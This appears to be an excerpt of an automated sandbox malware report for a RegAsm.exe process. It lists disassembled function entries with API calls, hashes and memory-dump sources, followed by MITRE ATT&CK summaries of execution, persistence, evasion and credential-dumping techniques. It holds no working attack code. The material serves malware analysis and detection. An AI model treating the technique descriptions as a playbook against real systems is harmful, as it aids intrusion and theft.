Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659

Function 6C523850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C59F860), ref: 6C52385C
ReleaseSRWLockExclusive.KERNEL32(6C59F860,?), ref: 6C523871

Strings

,Yl, xrefs: 6C52387A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,Yl
API String ID: 17069307-3435318273
Opcode ID: a7e80af82a84175793d9cf295b69736d39bd6557a827de9abb05a84ff0c46401
Instruction ID: 3d69509bc58f42e1479e085166ea82d3af3210f1bd01a51d2f91183102906ce1
Opcode Fuzzy Hash: a7e80af82a84175793d9cf295b69736d39bd6557a827de9abb05a84ff0c46401
Instruction Fuzzy Hash: C2E0DF32902B98978B11AF968C0158A3BFCEE476903074285F4091BA00C770954086CA

Function 6C52BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C52BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C52BEF5

Strings

cryptbase.dll, xrefs: 6C52BEF0

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: ac41a4177a81c9a08430682efe30e36d01e81e1e822963c08c98f4215dbe473b
Instruction ID: 91fe2795ef34d9aa730451486f46e9af452ed58a14c0add219651ae275b3c60f
Opcode Fuzzy Hash: ac41a4177a81c9a08430682efe30e36d01e81e1e822963c08c98f4215dbe473b
Instruction Fuzzy Hash: 41D022322C024CEBEB10BFA08C0AF2A3BFCA702325F11C020F71684991C7B1A810CF88

Function 6C5150E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C514E9C,?,?,?,?,?), ref: 6C51510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C514E9C,?,?,?,?,?), ref: 6C515167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C515196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C514E9C), ref: 6C515234

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: dc8237e1917beeacf3b27bc1d5d0d29573bf0ff348c323aa776f584acc2ec17f
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: B891B235509616CFDB15CF08C894A5ABBA1FF99318B28868CDC585BB15D771FC42CBE0

Function 6C5508F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E7DC), ref: 6C550918
LeaveCriticalSection.KERNEL32(6C59E7DC), ref: 6C5509A6
EnterCriticalSection.KERNEL32(6C59E7DC,?,00000000), ref: 6C5509F3
LeaveCriticalSection.KERNEL32(6C59E7DC), ref: 6C550ACB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a19671d6b59c3a3a1b414a6ec770f67af879b4e88f804b78d4d5d24004d43707
Instruction ID: 6d920a90c1b190edeae4e3947516ee6a6f0e56f9eace90ea41d1f375a11fb401
Opcode Fuzzy Hash: a19671d6b59c3a3a1b414a6ec770f67af879b4e88f804b78d4d5d24004d43707
Instruction Fuzzy Hash: F65136367016D0CBEB049E55CC0062633B6FBC2B28B66867BD86597F80DB70EC5187C5

Function 6C5759C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C54E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C575A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C54E56A,?,|UrlbarCSSSpan), ref: 6C575A5C
free.MOZGLUE(?), ref: 6C575A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C575B9D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 4a21de35f8b6367cbc4c989f31c9b5c341b7c49aedd737c12ba863012079b2e9
Instruction ID: 240bed2285223c57f76ac9624206e36c47a84684cde35bcae62a8fa11a982d81
Opcode Fuzzy Hash: 4a21de35f8b6367cbc4c989f31c9b5c341b7c49aedd737c12ba863012079b2e9
Instruction Fuzzy Hash: 72515E705087409FDB10CF29CCC4A1AB7E5FF89319F44C96DE8899B646E774E984CB62

Function 6C56B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C56B2C9,?,?,?,6C56B127,?,?,?,?,?,?,?,?,?,6C56AE52), ref: 6C56B628

Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C5690FF
Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C569108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C56B2C9,?,?,?,6C56B127,?,?,?,?,?,?,?,?,?,6C56AE52), ref: 6C56B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C56B2C9,?,?,?,6C56B127,?,?,?,?,?,?,?,?,?,6C56AE52), ref: 6C56B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C56B127,?,?,?,?,?,?,?,?), ref: 6C56B74D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 1fe3962c90aaa6a99b3602c016c47a847435a732165ebe89e4aade5d84228f1b
Instruction ID: 647b02f776cea22bd35be21e6dac7fa81aa6cf79695601356aed14d8626dd42a
Opcode Fuzzy Hash: 1fe3962c90aaa6a99b3602c016c47a847435a732165ebe89e4aade5d84228f1b
Instruction Fuzzy Hash: E751F371A052158FDB14DF1ACD8475EF7B5FF45304F06852DE85AABB20EB31A804CBA1

Function 6C56DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C55FF2A), ref: 6C56DFFD

Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C5690FF
Part of subcall function 6C5690E0: free.MOZGLUE(?,00000000,?,?,6C56DEDB), ref: 6C569108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C55FF2A), ref: 6C56E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C55FF2A), ref: 6C56E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C55FF2A), ref: 6C56E0FE

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 3ce997b818f54c6a7bf3325c0928d9d515418b95eafbee708d31ed7b51256a1b
Instruction ID: ba8524bff03d448718264850091ce38bfbb62449814aa0e941f5e0611786bb7f
Opcode Fuzzy Hash: 3ce997b818f54c6a7bf3325c0928d9d515418b95eafbee708d31ed7b51256a1b
Instruction Fuzzy Hash: D941E1B1606206CFEB14CF69CC8035A73B6AB45318F150939D556DBF60E7B2E905CB92

Function 6C576180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C5761DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C57622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C576250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C576292

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 814fad9117dd78b53d18fd6b26f3ea9826ea126711ad78876c9b112f9a5ec636
Instruction ID: fc80075f90a52fa86f25d8731600d2de6292db09e4069aa278b7cc600223cd6a
Opcode Fuzzy Hash: 814fad9117dd78b53d18fd6b26f3ea9826ea126711ad78876c9b112f9a5ec636
Instruction Fuzzy Hash: EE312671A00A0A8FDB14CF28DC84AAA73E9FB95308F114579C55AD7651FB31E598C760

Function 6C566E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C566EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C566EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C566F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C566F5C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 118487cc7f970b05e6e6208b4e94a7d38fdc5187eb5addaec2cbac7952fada4d
Instruction ID: f5f6a5814a8278fc03a01d9a35003fb5be58df5bff996352c2dcce69691dc144
Opcode Fuzzy Hash: 118487cc7f970b05e6e6208b4e94a7d38fdc5187eb5addaec2cbac7952fada4d
Instruction Fuzzy Hash: D6312671A1060A8FDB04CF2DCC806AEB3E9EB94304F51463DD41AC7A65EF31EA59C790

Function 6C57B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C520A4D), ref: 6C57B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C520A4D), ref: 6C57B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C520A4D), ref: 6C57B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C520A4D), ref: 6C57B67F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 636da7e7df0899ea9d681190c61f61fe76ee099b492319aac339d576909a575f
Instruction ID: a69d9823282cceda6c6ac5a9938b3bb76c4f6a6e84c349c5e11da5d3e5174bdf
Opcode Fuzzy Hash: 636da7e7df0899ea9d681190c61f61fe76ee099b492319aac339d576909a575f
Instruction Fuzzy Hash: EC31D471A012168FDB20EF58CC4865ABBB6FF81304F178A69C9069B301EB31E955CBA1

Function 6C54F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C54F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C54F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C54F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C54F668

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: a67bc118e6d480c6df59aa6d03f4fc0eb8bdc3d0cf2e7b36296995fc8b0ae7c1
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 3E313E71A00214AFC714DF5DCCC4A9E77B5EBC4358B14CA39EA498BB05D731F9458B90

Function 6C52B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C52B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C52B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C52B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C52B9B9

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 58c502baeab14e2c8becf6761255a9421471700ec9dbda73aeb519b983e8eb86
Instruction ID: f4200b8aa8eb27a78b4d0e6d4ca060da4f79ad47d87417aa4099a04f28c3a9b5
Opcode Fuzzy Hash: 58c502baeab14e2c8becf6761255a9421471700ec9dbda73aeb519b983e8eb86
Instruction Fuzzy Hash: 8B114FB1A002059FCB04DF69DC848AFB7F8BF98314B14893AE91AD3701E731A915CAA1

Function 6C5626B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5626C1
free.MOZGLUE(?), ref: 6C5626E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5626FF
free.MOZGLUE ref: 6C56270D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 00d6b28e8a097ee7c335baa2d8092d659856fe5d44749b7290f58bb1c91510be
Instruction ID: 7e4223c5360c38d135614dcc0da784976295af954527a8703d839482739dfaca
Opcode Fuzzy Hash: 00d6b28e8a097ee7c335baa2d8092d659856fe5d44749b7290f58bb1c91510be
Instruction Fuzzy Hash: 4AF0F4B27012015BEB009E1AEC88E4BB3A9EF41258B550035EA1AC3F12F731F918C7A6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

